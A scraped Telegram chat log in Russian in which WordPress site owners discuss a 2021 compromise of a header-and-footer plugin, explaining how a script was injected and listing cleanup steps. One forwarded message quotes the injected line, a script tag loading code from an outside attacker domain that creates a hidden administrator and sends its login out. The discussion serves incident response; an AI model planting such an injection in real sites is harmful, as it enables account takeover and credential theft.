Size: a a a

Team 36|LinkParty.ru

2021 April 24

А

Александр in Team 36|LinkParty.ru
Нет ничего на сайте
источник

А

Александр in Team 36|LinkParty.ru
В чем взлом заключается? Дай больше инфы. У меня он на всех сайтах стоит и даже больше скажу, на клиентском
источник

AS

Anatoliy Sevruk in Team 36|LinkParty.ru
источник

А

Александр in Team 36|LinkParty.ru
Вот теперь спасибо, запостю на канале
источник

M

Mdevostator in Team 36|LinkParty.ru
Переслано от Михаил Flat
Попытаюсь объяснить как произошёл взлом:
злоумышленник через admin-ajax.php воспользовался уязвимостью и внедрил код
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
в раздел header и footer, затем вы или другой администратор сайта зашёл на сайт залогиненым

в браузере сработал вредоносный код, который отправил запрос на /wp-admin/user-new.php на создание нового юзера, если это сделает любой другой человек - ничего не произойдёт, но если это сделает администратор, то новый пользователь будет создан!

затем скрипт отправил логин и пароль атакующему.
источник

M

Mdevostator in Team 36|LinkParty.ru
Переслано от Alexander Bukreev
Что точно надо:
1. Снести в плагине в header & footer строку с вредоносом.
2. Снести в списке админов нового с адресом ...@wordpress.local
3. Снести папку плагина wp-xmlrpc-disable, если она уже есть свежая.
источник

M

Mdevostator in Team 36|LinkParty.ru
источник

D

Diev in Team 36|LinkParty.ru
Все так ))
источник

D

Diev in Team 36|LinkParty.ru
К слову на своих нашел только скрипт
источник

D

Diev in Team 36|LinkParty.ru
Отчистить кеши все надо, браузерные то же. И проверить через 3-4 дня еще оаз
источник

А

Александр in Team 36|LinkParty.ru
У меня ничего нет
источник

D

Diev in Team 36|LinkParty.ru
Хорошо же. Ни на одном сайте ? Именно в настройках плагина, в разделе header..
источник

А

Александр in Team 36|LinkParty.ru
Ни пользователя ни стррчек в скрипте. Похоже не попал в его список
источник

А

Александр in Team 36|LinkParty.ru
Ага, в настройках и юзера нету. Ни на одном сайте нет
источник

М

Михаил Flat in Team 36|LinkParty.ru
Скрипт удалён по этому пути, атака остановилась на следующий день после поста
источник

D

Diev in Team 36|LinkParty.ru
О приветствую, твой плагин лучший, не давай его в обиду )))
источник

AB

Alexander Bukreev in Team 36|LinkParty.ru
Удалось довольно оперативно отключить домен, откуда подгружался вредоносный скрипт. Соотвественно он перестал работать.
источник

D

Diev in Team 36|LinkParty.ru
У меня кстати на втором сайте был более длинный код, отличающийся от первого, где была ссылка на скрипт, на левом сайте..🤷‍♂️ я его потер так же естесно
источник
2021 April 26

ЕФ

Евгений Филатов... in Team 36|LinkParty.ru
Доброго времени суток всем
Кому не жалко, можете скинуть курс по php и/или питону
Кто что может может посоветовать ?
А то уже пол года херней страдаю по большому счету
А языки программирования давно собирался начать изучать
источник

ЕФ

Евгений Филатов... in Team 36|LinkParty.ru
Заранее спасибо всем)
источник